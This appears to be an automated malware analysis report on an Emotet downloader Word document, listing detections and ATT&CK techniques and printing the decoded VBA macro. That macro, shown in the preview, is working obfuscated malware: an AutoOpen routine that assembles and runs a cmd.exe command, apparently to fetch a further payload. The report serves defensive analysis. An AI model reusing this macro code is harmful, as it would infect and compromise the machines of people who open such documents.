Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6883999-0', indicating it's likely an Emotet downloader. The presence of an AutoOpen VBA macro, detected by multiple heuristics, strongly suggests an automated execution path. The macro attempts to construct and execute a command using 'cmd.exe', likely to download and run a secondary payload.
Heuristics (5)
- ClamAV: Doc.Downloader.Emotet-6883999-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6883999-0
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 4bb8c0dbacb68b418e056803e4f16a4ceec5c84871505980f20c3fae448d42d6) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5203 bytes |

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "uFkwztOTWpLU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Chr(331882338)
TypeName Chr(NLKvZZ)
TypeName CInt(60053 * RjYGW)
TypeName CStr(WGtYdM)
TypeName Sin(lFLFT)
TypeName CSng(7774 + 12384 + nqPQRa / QjYcK)
Shell@ CStr("c") + CStr("m") + SopblkLwvu + IAEbvWK + iQuTJzTu + wiFUnz + lpvivCH + spSpMtknAqFdSE, 704546464 - 704546464
TypeName Chr(60104 * nYBGkb)
TypeName CByte(69375 / 8688)
End Sub
Attribute VB_Name = "jiBJIZkVJd"
Function iQuTJzTu()
On Error Resume Next
TypeName LIiMZs
TypeName 531734987
TypeName Oct(2)
zCMSBRoj = "d /V/C" + CStr(Chr(XofXwaJH + KVniIcjhQAvt + 34 + iFEahtIzWG + lnAMRZZTIPPuG)) + "s" + "et" + " LX" + "FN" + "=FVqk" + "wiKtOks" + "NXKDQGXPmQ"
TypeName 92
TypeName Rnd(694)
TypeName Otwbd
AEVVHTz = "zlj;$Yrvc" + ":/ a)u" + "y" + "\H" + "d'U" + "WB3b(" + "enx9" + "}" + ".@I,2=o" + "EhS-Rp+f{4"
TypeName Sin(QsaOwU + ROCHwh / 38524 / SWozGj)
TypeName Tan(EfUGhT)
ifGMzpQZBfl = "C&&fo" + "r %" + "Z in (64,5" + "8,4,47,27" + ",10,60,4"
TypeName 5
TypeName Tan(zuPEza)
aFDLScn = "7,22," + "22,32,25" + ",2," + "33," + "64,5" + "7,48" + ",47," + "4,62,58"
TypeName CInt(129571863)
TypeName CByte(72110 + vMjZN - GwpKF - OVjiOF)
TypeName 5
tOobMakQCdV = ",45,23,47" + "," + "29,7,32,11" + ",47," + "7,52,42," + "47,45,6" + "9,22," + "5,47,48," + "7,24,25," + "21,23,63,5" + "7,40," + "60,7,7,64" + ",30,3"
TypeName Sgn(EkZVO)
TypeName ckFpL
BcXKb = "1,31," + "47,44,39," + "33,5,52" + ",2" + "9,58,19" + ",31,11,1" + "6,53" + ",60,7,7"
TypeName Sgn(3)
TypeName Oct(62919 / KNjEj)
TypeName Sin(10095 / 2702)
uDvBQlizI = ",64,30,3" + "1" + ",31,45,47" + ",22," + "5" + ",47,66,6" + "2,10,3" + "6,10,7,47," + "19," + "10,5" + "2,29,5" + "8,19,"
TypeName 19109829
TypeName 1113
SlAoMa = "31,20,18," + "56," + "5," + "59,5" + "3" + ",60,7," + "7,64," + "30," + "31" + ",31,33,"
TypeName CSng(442677)
TypeName CSng(83932 / iIwAru)
TypeName MazADN
jwDzzKq = "45,3" + "3,9,3" + "5,10,62,45" + ",5,3" + "5,27,58,52" + ",48,47,7," + "31,31,2" + "6," + "50,64,4" + "1,20,2" + "," + "43,43,53,6" + "0"
TypeName Hex(4617)
TypeName 526
TypeName jmIUrT
NLMTljL = ",7,7,64,30" + "," + "31,31,44,1" + "9,35,10," + "5,29,52,4"
iQuTJzTu = zCMSBRoj + AEVVHTz + ifGMzpQZBfl + aFDLScn + tOobMakQCdV + BcXKb + uDvBQlizI + SlAoMa + jwDzzKq + NLMTljL
TypeName Hex(RSSYz)
TypeName KrfcPf
End Function
Function wiFUnz()
On Error Resume Next
TypeName MzOVK
TypeName Oct(sFwVw / cftLK / nEjXP + RuHbC)
TypeName Int(GzBJWA)
jwBzNROG = "8,47,7,31," + "5,38,54,1" + "0,53,6" + "0,7,7," + "64,30,31,3" + "1,23" + ",58,45" + ",33" + ",27,45," + "33," + "5"
TypeName CSng(2)
TypeName CByte(289178597)
TypeName imDAXm
arsfNMw = "2," + "29,5" + "8" + ",19,3" + "1," + "4,64,62," + "29,5" + "8,48" + ",7,47,4" + "8,7,31,3" + "6,44,0," + "16,"
TypeName Log(283116337)
TypeName 406617831
TypeName zARCJi
HAQwnKL = "40" + ",52,61,6" + "4,22,5,7,4" + "6,40," + "53,40,34,"
TypeName Cos(WKZIb)
TypeName CInt(814)
JuOVf = "24," + "25," + "23," + "8" + ",23,32,57" + ",32,40"
TypeName CBool(830)
TypeName 9
vEipKqYqNpa = ",68" + ",56," + "56" + ",40,24,2" + "5,2,69" + ",28,57," + "25,47,48," + "28,30,7,"
TypeName UwPlm
TypeName Tan(CEWtB)
wNbzlAaGD = "47," + "19,6" + "4" + ",65,4" + "0,3" + "7,40,65,25" + ",23,8," + "23,65,40,5" + "2,4" + "7,49,47," + "40,24,6"
TypeName 159
TypeName 235607262
KjcWAuwAKMk = "6" + ",5" + "8,27" + ",47,33" + ",29,6" + "0,46,25,4" + "8" + ",2,5,32,5" + ",48,32," + "2" + "5,21" + ",23,63,34," + "67,7,27,36"
TypeName Sgn(fVnXwI)
TypeName Chr(UFQQIc * rvjhDv)
TypeName Round(304007820)
YwzWhVHb = ",67," + "25,2,33," + "64,52,14," + "58" + ",4,48,22,5" + "8,33,39,0," + "5,22,47,4" + "6,25,48"
TypeNam
... (truncated)